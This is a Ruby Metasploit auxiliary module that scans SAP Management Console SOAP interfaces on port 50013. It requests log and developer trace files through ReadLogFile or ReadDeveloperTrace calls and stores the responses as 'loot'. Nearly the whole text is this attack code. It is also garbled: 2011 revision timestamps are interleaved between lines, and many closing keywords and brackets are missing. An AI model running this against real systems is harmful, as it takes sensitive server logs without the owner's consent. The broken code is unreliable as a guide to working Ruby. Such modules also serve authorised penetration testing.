2011-03-02 10:18:31 +00:00
# $Id$
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
require 'msf/core'
class Metasploit3 < Msf :: Auxiliary
include Msf :: Exploit :: Remote :: HttpClient
include Msf :: Auxiliary :: Report
include Msf :: Auxiliary :: Scanner
def initialize
super (
'Name' = > 'SAP Management Console Get Logfile' ,
'Version' = > '$Revision$' ,
'Description' = > %q{ This module simply attempts to download available logfiles and developer tracefiles through the SAP Management Console SOAP Interface. Please use the sap_manamgenet_console_listlogfiles extension to view a list of availble files. } ,
'References' = >
# General
[ 'URL' , 'http://blog.c22.cc' ]
] ,
'Author' = > [ 'Chris John Riley' ] ,
'License' = > MSF_LICENSE
register_options (
Opt :: RPORT ( 50013 ) ,
OptString . new ( 'URI' , [ false , 'Path to the SAP Management Console ' , '/' ] ) ,
2011-03-11 16:50:18 +00:00
OptString . new ( 'RFILE' , [ true , 'The name of the file to download' , 'sapstart.log' ] ) ,
2011-03-02 10:18:31 +00:00
OptString . new ( 'FILETYPE' , [ true , 'Specify LOGFILE or TRACEFILE' , 'TRACEFILE' ] ) ,
OptString . new ( 'UserAgent' , [ true , " The HTTP User-Agent sent in the request " ,
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ] ) ,
] , self . class )
register_autofilter_ports ( [ 50013 ] )
deregister_options ( 'RHOST' )
def rport
datastore [ 'RPORT' ]
def run_host ( ip )
res = send_request_cgi ( {
'uri' = > " / #{ datastore [ 'URI' ] } " ,
'method' = > 'GET' ,
'headers' = >
'User-Agent' = > datastore [ 'UserAgent' ]
} , 25 )
return if not res
gettfiles ( ip )
def gettfiles ( rhost )
verbose = datastore [ 'VERBOSE' ]
2011-03-11 16:50:18 +00:00
print_status ( " #{ rhost } : #{ rport } [SAP] Connecting to SAP Management Console SOAP Interface " )
2011-03-02 10:18:31 +00:00
success = false
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
xs = 'http://www.w3.org/2001/XMLSchema'
sapsess = 'http://www.sap.com/webas/630/soap/features/session/'
case " #{ datastore [ 'FILETYPE' ] } "
2011-03-11 16:50:18 +00:00
when / ^LOG /i
2011-03-02 10:18:31 +00:00
ns1 = 'ns1:ReadLogFile'
2011-03-11 16:50:18 +00:00
when / ^TRACE /i
2011-03-02 10:18:31 +00:00
ns1 = 'ns1:ReadDeveloperTrace'
data = '<?xml version="1.0" encoding="utf-8"?>' + " \r \n "
data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '" xmlns:xsi="' + xsi + '" xmlns:xs="' + xs + '">' + " \r \n "
data << '<SOAP-ENV:Header>' + " \r \n "
data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + " \r \n "
data << '<enableSession>true</enableSession>' + " \r \n "
data << '</sapsess:Session>' + " \r \n "
data << '</SOAP-ENV:Header>' + " \r \n "
data << '<SOAP-ENV:Body>' + " \r \n "
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"><filename>' + " #{ datastore [ 'RFILE' ] } " + '</filename></' + ns1 + '>' + " \r \n "
data << '</SOAP-ENV:Body>' + " \r \n "
data << '</SOAP-ENV:Envelope>' + " \r \n \r \n "
res = send_request_raw ( {
'uri' = > " / #{ datastore [ 'URI' ] } " ,
'method' = > 'POST' ,
'data' = > data ,
'headers' = >
'Content-Length' = > data . length ,
'SOAPAction' = > '""' ,
'Content-Type' = > 'text/xml; charset=UTF-8' ,
} , 120 )
env = [ ]
if res . code == 200
case res . body
when nil
# Nothing
when / <item>([^<]+)< \/ item> /i
body = [ ]
body = res . body
env = body . scan ( / <item>([^<]+)< \/ item> /i )
success = true
case res . body
when nil
# Nothing
when / <name>([^<]+)< \/ name> /i
2011-03-02 18:46:00 +00:00
name = $1 . strip
2011-03-02 10:18:31 +00:00
success = true
2011-03-11 16:50:18 +00:00
elsif res . code == 500
2011-03-02 10:18:31 +00:00
case res . body
when / <faultstring>(.*)< \/ faultstring> /i
2011-03-02 18:46:00 +00:00
faultcode = $1 . strip
2011-03-02 10:18:31 +00:00
fault = true
rescue :: Rex :: ConnectionError
2011-03-11 16:50:18 +00:00
print_error ( " #{ rhost } : #{ rport } [SAP] Unable to connect " )
2011-03-02 10:18:31 +00:00
if success
2011-03-11 16:50:18 +00:00
print_good ( " #{ rhost } : #{ rport } [SAP] #{ datastore [ 'FILETYPE' ] . downcase } : #{ datastore [ 'RFILE' ] . downcase } looted " )
2011-03-02 18:46:00 +00:00
store_loot ( " sap. #{ datastore [ 'FILETYPE' ] . downcase } file " , " text/xml " , rhost , res . body , " sap_ #{ datastore [ 'RFILE' ] . downcase } .xml " ,
" SAP Get Logfile " )
2011-03-02 10:18:31 +00:00
elsif fault
2011-03-11 16:50:18 +00:00
print_error ( " #{ rhost } : #{ rport } [SAP] Errorcode: #{ faultcode } " )
2011-03-02 10:18:31 +00:00
2011-03-11 16:50:18 +00:00
print_error ( " #{ rhost } : #{ rport } [SAP] failed to request environment " )
2011-03-02 10:18:31 +00:00